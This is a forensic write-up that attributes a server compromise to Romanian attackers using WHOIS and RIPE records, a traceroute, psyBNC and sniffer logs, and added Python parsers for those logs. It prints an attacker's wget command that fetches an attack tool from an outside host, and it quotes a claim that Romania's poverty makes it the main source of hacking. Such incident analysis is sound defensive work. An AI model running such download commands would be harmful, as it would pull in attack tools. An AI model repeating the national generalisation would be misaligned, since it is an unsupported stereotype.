Bonus Question:
What nationality do you believe the attacker(s) to be, and why?

 

The attack came from Romania, but we cannot be 100% sure that the attacker is actually located in that country: the machine in Romania could itself be just another compromised host.

The attacker downloads the following file (as seen in .bash_history):

wget izolam.net/sslstop.tar.gz

How could he know that the file was there?
When I tried to connect to www.izolam.net, all I found was a Flash splash page, and that's it.

izolam.net resolves to 63.99.224.38.

 

Moreover, the sniffer log (the 'mfs' file in /lib/.x/s) also shows connections to the FTP server (port 21) on the same address, 63.99.224.38:

 

============================================================
Time: Sun Aug 10 15:40:47 Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------

 
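As an added example (not part of the original write-up), here is a small Python parser for the record layout of the 'mfs' sniffer log shown above: it splits the dump into records, pulls out time, size, source, destination and port, counts the (destination, port) pairs the compromised host talked to, and checks which destinations fall inside a given CIDR, such as the PCNET route 213.154.116.0/22 quoted further down this page. The sample dump is constructed: the first record is the one quoted above, the other two are invented for illustration, and the payload lines are placeholders rather than captured data.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in the record layout of the 'mfs' sniffer log quoted above.
# The first record is the one on the page; the other two are invented for this
# example and their payload lines are placeholders, not captured data.
SAMPLE_MFS = """\
============================================================
Time: Sun Aug 10 15:40:47 Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
(payload bytes)
============================================================
Time: Sun Aug 10 15:41:02 Size: 57
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
(payload bytes)
============================================================
Time: Sun Aug 10 16:02:11 Size: 212
Path: 192.168.1.79 => 213.154.118.219 [22]
------------------------------------------------------------
(payload bytes)
"""

TIME_RE = re.compile(r"^Time: (?P<time>.+?) Size: (?P<size>\d+)$")
PATH_RE = re.compile(r"^Path: (?P<src>\S+) => (?P<dst>\S+) \[(?P<port>\d+)\]$")


def parse_mfs(text):
    """Split the dump into records and extract the header fields of each.

    A record starts with a line of '=', then a Time/Size line, a Path line,
    a line of '-', and finally the captured payload until the next record.
    Records that never get a complete header (truncated dump) are dropped.
    """
    records = []
    current = None
    for line in text.splitlines():
        if line.startswith("===="):
            current = {"payload": []}
            records.append(current)
            continue
        if current is None:
            continue  # junk before the first separator
        m = TIME_RE.match(line)
        if m:
            current["time"] = m.group("time")
            current["size"] = int(m.group("size"))
            continue
        m = PATH_RE.match(line)
        if m:
            current["src"] = m.group("src")
            current["dst"] = m.group("dst")
            current["port"] = int(m.group("port"))
            continue
        if line.startswith("----"):
            continue
        current["payload"].append(line)
    return [r for r in records if "time" in r and "dst" in r]


def destinations(records):
    """Count outbound (destination, port) pairs: the pivot used in the analysis."""
    return Counter((r["dst"], r["port"]) for r in records)


def in_networks(records, cidrs):
    """Return the destination addresses that fall inside any of the CIDRs.

    Used to test destinations against a registry route such as the RIPE
    route 213.154.116.0/22 quoted further down the page.
    """
    nets = [ipaddress.ip_network(c) for c in cidrs]
    hits = set()
    for r in records:
        try:
            addr = ipaddress.ip_address(r["dst"])
        except ValueError:
            continue  # destination logged as a hostname, not an address
        if any(addr in n for n in nets):
            hits.add(r["dst"])
    return hits


if __name__ == "__main__":
    recs = parse_mfs(SAMPLE_MFS)
    for (dst, port), n in destinations(recs).most_common():
        print(f"{dst}:{port}  {n} record(s)")
    print("inside PCNET route:", in_networks(recs, ["213.154.116.0/22"]))
```

Run against the real 'mfs' file, the (destination, port) counter is what turns a single record like the one above into a list of every external host the sniffer saw the victim contact, and the CIDR check ties those hosts back to the registry objects quoted later.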

So let's see:

 

WHOIS (networksolutions.com) for:

izolam.net

Registrant:
Buskey, Daniel (LIKTBZWGKD)
6127 Green Bay Rd
Suite 400
Kenosha, WI 53142
US

Domain Name: IZOLAM.NET

Administrative Contact:
Buskey, Daniel (COKGNLAFEI) sales@readyhosting.com
6127 Green Bay Rd
Suite 400
Kenosha, WI 53142
US
262-652-7640
Technical Contact:
Ready Hosting Inc. (TWHBUQCCZO) sysadmin@readyhosting.com
6127 Green Bay Road
Suite 400
Kenosha, WI 53142
US
262-652-7640 fax: 262-652-7650

Record expires on 10-May-2004.
Record created on 10-May-2003.
Database last updated on 8-Sep-2003 06:38:20 EDT.

Domain servers in listed order:

NS5.READYHOSTING.COM 63.99.209.103
NS6.READYHOSTING.COM 63.99.209.104

 

So izolam.net is registered in the US. How did the attacker know the file was there? A hacker buddy over there? Google? We just don't know, and cannot know from the evidence at hand.


The Romanian addresses, on the other hand, are:

213.154.118.219
extreme-service-10.is.pcnet.ro, which resolves to 213.154.118.218
213.154.118.218 also appears elsewhere as a bare address, not resolved to an FQDN.

These addresses belong to:

inetnum: 213.154.96.0 - 213.154.127.255
netname: PCNET
descr: PCNET Data Network S.A.
descr: PROVIDER ADSL Network
country: RO
admin-c: BT17-RIPE
tech-c: PDNN1-RIPE
status: ASSIGNED PA
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20030704
source: RIPE

route: 213.154.116.0/22
descr: PCNET
origin: AS8503
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20020912
source: RIPE

role: PCNET Data Network NOC
address: Splaiul Unirii, nr. 10
address: Bucharest, ROMANIA
phone: +40 1 330 86 61
phone: +40 1 330 35 23
fax-no: +40 1 675 49 99
e-mail: tudor@pcnet.ro
trouble: +40 9 325 18 84
admin-c: BT17-RIPE
tech-c: BT17-RIPE
tech-c: AP158-RIPE
tech-c: CM3059-RIPE
tech-c: CN19-RIPE
tech-c: IG20-RIPE
tech-c: CR60-RIPE
nic-hdl: PDNN1-RIPE
remarks: ----------
remarks: abuse: abuse@pcnet.ro
remarks: ----------
remarks: for escaladation please directly call the
remarks: technical manager
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20011008
source: RIPE

person: Bogdan Tudor
remarks: Technical Manager
remarks: PCNET Data Network S.A.
address: Bucharest, Romania
phone: +40 9 325 18 84
phone: +40 1 330 86 61
phone: +40 1 330 35 23
fax-no: +40 1 675 49 99
nic-hdl: BT17-RIPE
mnt-by: BT17-RIPE-MNT
notify: tudor@pcnet.ro

 

Thus our two contiguous addresses in the same network: they might just be two addresses in this provider's DHCP pool for dial-up connections, or they might be on the same leased line, with two crackers 'working' together. I suppose that they were two people; this is very likely, since we see that TWO users were created on the psyBNC. In particular, the first user, 'sic', creates the account for his 'buddy', 'redcode'. In the psyBNC log they connect from different addresses:

[...]
Sun Aug 10 16:07:34 :connect from sanido-09.is.pcnet.ro
Sun Aug 10 16:07:47 :User sic logged in.
[...]
Sun Aug 10 17:49:41 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:49:47 :User sic logged in.
Sun Aug 10 17:50:39 :New User:redcode (4,1redCode8Chicken) added by sic
Sun Aug 10 17:50:51 :User redcode () has no server added
Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:51:22 :User redcode logged in.
[...]

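As an added example (again, not from the original analysis), the following Python snippet performs the correlation described above mechanically: it walks the psyBNC log, attributes each 'User ... logged in.' line to the host named in the preceding 'connect from' line, records who added which account, and collapses the hostnames to their provider domain so that several dial-up hostnames from one ISP show up as a single source network. The sample log is the excerpt quoted above, embedded inline so the script runs offline.

```python
import re
from collections import defaultdict

# The psyBNC log excerpt quoted above, embedded here so the script runs offline.
SAMPLE_PSYBNC = """\
Sun Aug 10 16:07:34 :connect from sanido-09.is.pcnet.ro
Sun Aug 10 16:07:47 :User sic logged in.
Sun Aug 10 17:49:41 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:49:47 :User sic logged in.
Sun Aug 10 17:50:39 :New User:redcode (4,1redCode8Chicken) added by sic
Sun Aug 10 17:50:51 :User redcode () has no server added
Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:51:22 :User redcode logged in.
"""

# 'Sun Aug 10 16:07:34 :message' -> timestamp and message
LINE_RE = re.compile(r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) :(?P<msg>.*)$")
CONNECT_RE = re.compile(r"^connect from (?P<host>\S+)$")
LOGIN_RE = re.compile(r"^User (?P<user>\S+) logged in\.$")
ADDED_RE = re.compile(r"^New User:(?P<user>\S+) .*added by (?P<creator>\S+)$")


def correlate(text):
    """Attribute each login to the host of the preceding 'connect from' line.

    psyBNC logs the TCP connection and the login as separate lines and the
    login line carries no address, so the most recent unconsumed connect is
    taken as the login's source. Returns (logins, created_by) where logins
    maps user -> sorted list of hosts and created_by maps user -> creator.
    """
    logins = defaultdict(set)
    created_by = {}
    last_host = None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        msg = m.group("msg")
        c = CONNECT_RE.match(msg)
        if c:
            last_host = c.group("host")
            continue
        lg = LOGIN_RE.match(msg)
        if lg and last_host is not None:
            logins[lg.group("user")].add(last_host)
            last_host = None  # one connect feeds exactly one login
            continue
        a = ADDED_RE.match(msg)
        if a:
            created_by[a.group("user")] = a.group("creator")
    return {u: sorted(h) for u, h in logins.items()}, created_by


def provider_domains(logins):
    """Collapse hostnames to their last two labels (e.g. pcnet.ro) and list
    which users logged in from each, so several dial-up hostnames of one ISP
    count as a single source network.
    """
    domains = defaultdict(set)
    for user, hosts in logins.items():
        for h in hosts:
            labels = h.split(".")
            suffix = ".".join(labels[-2:]) if len(labels) >= 2 else h
            domains[suffix].add(user)
    return {d: sorted(u) for d, u in domains.items()}


if __name__ == "__main__":
    logins, created_by = correlate(SAMPLE_PSYBNC)
    for user, hosts in logins.items():
        print(f"{user}: logged in from {', '.join(hosts)}")
    for user, creator in created_by.items():
        print(f"{user} was added by {creator}")
    print("source networks:", provider_domains(logins))
```

The connect-to-login pairing relies on the two lines being adjacent in the log, which holds for the excerpt above; on a busy bouncer with overlapping connections the attribution can be wrong, so treat it as a lead to verify against the sniffer log rather than as proof.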
 

The source of the connection is a broadband provider in Romania (just visit their web page, www.pcnet.ro, which says so).

 

domain-name: pcnet.ro
description: PC-NET Data Network
admin-contact: MB51-ROTLD
technical-contact: AN160-ROTLD
zone-contact: AB494-ROTLD
nameserver: ns1.pcnet.ro 213.154.128.1
nameserver: ns2.pcnet.ro 213.154.128.2
nameserver: ns3.pcnet.ro 213.154.128.3
info: object maintained by ro.rnc local registry
info: Register your .ro domain names at www.rotld.ro
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
mnt-lower: ROTLD-MNT
updated: domain-admin@listserv.rnc.ro 19970519
updated: ciprian@rnc.ro 19990601
updated: ciprian@rnc.ro 19991207
updated: cristih@rnc.ro 20000829
source: ROTLD

person: Mihai Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: mihai@pcnet.ro
nic-hdl: MB51-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD

person: Alina-Mihaela Nemes
address: PCNET DATA NETWORK SA
address: Bd. Mircea Eliade, nr. 18
address: Bucharest, Romania
phone: +40-21-2080460
fax-no: +40-21-2080461
e-mail: alina@pcnet.ro
nic-hdl: AN160-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
updated: imanea@rnc.ro 19991207
source: ROTLD

person: Adrian Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: adi@pcnet.ro
nic-hdl: AB494-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD

 

And, just to be extremely paranoid, we confirm the geographical location of the IP address with a traceroute:

 

Sam Spade traceroute to extreme-service-10.is.pcnet.ro:

extreme-service-10.is.pcnet.ro resolves to 213.154.118.218

Do not contact either Los Nettos (ln.net) or Centergate Research Group (centergate.com) based on the results of this traceroute.

3 130.152.180.21 10.489 ms isi-1-lngw2-atm.ln.net [AS226] Los Nettos origin AS
4 198.172.117.161 9.599 ms ge-9-3.a01.lsanca02.us.ra.verio.net [AS2914] Verio
5 129.250.46.121 9.908 ms ge-1-2-0.a00.lsanca02.us.ra.verio.net [AS2914] Verio
6 129.250.29.120 20.016 ms xe-1-0-0-4.r20.lsanca01.us.bb.verio.net [AS2914] Verio
7 144.232.9.201 17.436 ms sl-bb21-ana-9-1-1620xT1.sprintlink.net [AS1239] SprintLink Backbone
8 144.232.1.186 126.806 ms sl-bb23-ana-13-0.sprintlink.net [AS1239] SprintLink Backbone
9 144.232.18.61 81.474 ms sl-bb23-fw-9-1.sprintlink.net [AS1239] SprintLink Backbone
10 144.232.11.245 81.468 ms sl-bb21-fw-13-0.sprintlink.net [AS1239] SprintLink Backbone
11 144.232.9.30 75.929 ms sl-bb22-pen-13-0.sprintlink.net [AS1239] SprintLink Backbone
12 144.232.8.177 81.671 ms sl-bb23-pen-15-0.sprintlink.net [AS1239] SprintLink Backbone
13 144.232.20.117 81.080 ms sl-bb21-tuk-0-0.sprintlink.net [AS1239] SprintLink Backbone
14 144.232.19.70 226.869 ms sl-bb21-lon-14-0.sprintlink.net [AS1239] SprintLink Backbone
15 213.206.128.37 165.416 ms sl-bb20-lon-15-0.sprintlink.net
16 213.206.129.70 152.214 ms sl-bb21-par-14-0.sprintlink.net
17 217.118.224.33 159.985 ms sl-bb20-par-15-0.sprintlink.net
18 213.206.129.66 165.348 ms sl-bb21-fra-13-0.sprintlink.net
19 217.147.96.42 162.866 ms sl-gw10-fra-15-0.sprintlink.net
20 217.147.111.114 159.959 ms sle-gtshu-13-0.sprintlink.net
21 195.39.208.82 179.992 ms ro-defra-1.gtsce.net (DNS error)
22 193.226.179.10 183.797 ms r01-PO1-1-0.clj2.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
23 193.226.179.254 188.221 ms r01-PO4-0-0.brv2.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
24 193.226.179.30 193.798 ms r01-PO9-0-0.buh1.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
25 193.226.139.54 189.541 ms PC-NET3rd.RO.kpnQwest.net (DNS error) [AS5606] Bucharest ROMANIA
26 213.154.128.93 191.918 ms unassigned-reverse.pcnet.ro (DNS error) [AS8503] RO
27 213.154.129.82 202.897 ms atm-is-0-0.pcnet.ro (DNS error) [AS8503] RO
28 213.154.127.57 287.113 ms atm-core-0-0-60.is.pcnet.ro (DNS error) [AS8503] RO
29 213.154.116.141 225.351 ms extreme-service.is.pcnet.ro [AS8503] RO

 

It is likely that the attacker is Romanian. Mainly because of the use of multiple IP addresses within the same provider's network, it is LESS likely (but not impossible) that he was working through hacked Romanian machines.

Moreover, I have a suspicion (see also Answer N.9) that a string found in one of the recovered files, 'gustavo__.log.1u2', is somehow related to a person's name. I don't know the Romanian language, but it at least SOUNDS similar to my own language (Italian; both derive from Latin), and Gustavo IS a name in use in my country, so I suspect it is also used in Romania.

This also confirms what Lance Spitzner told me at 'Blackhat Europe 2003': "[...] For example, the more economically depressed a country is, the more hacking you see coming from it, like Romania. The vast majority of hacking comes from Romania, because they are so economically depressed. [...]" (The interview, published in Italian translation since it was for Italian readers, can be found at http://www.itvirtualcommunity.net/blackhat03/spitzner.asp. I also have the original write-up, in English, stored on my personal site: http://www.muscetta.org/spitzner_interview.txt.)
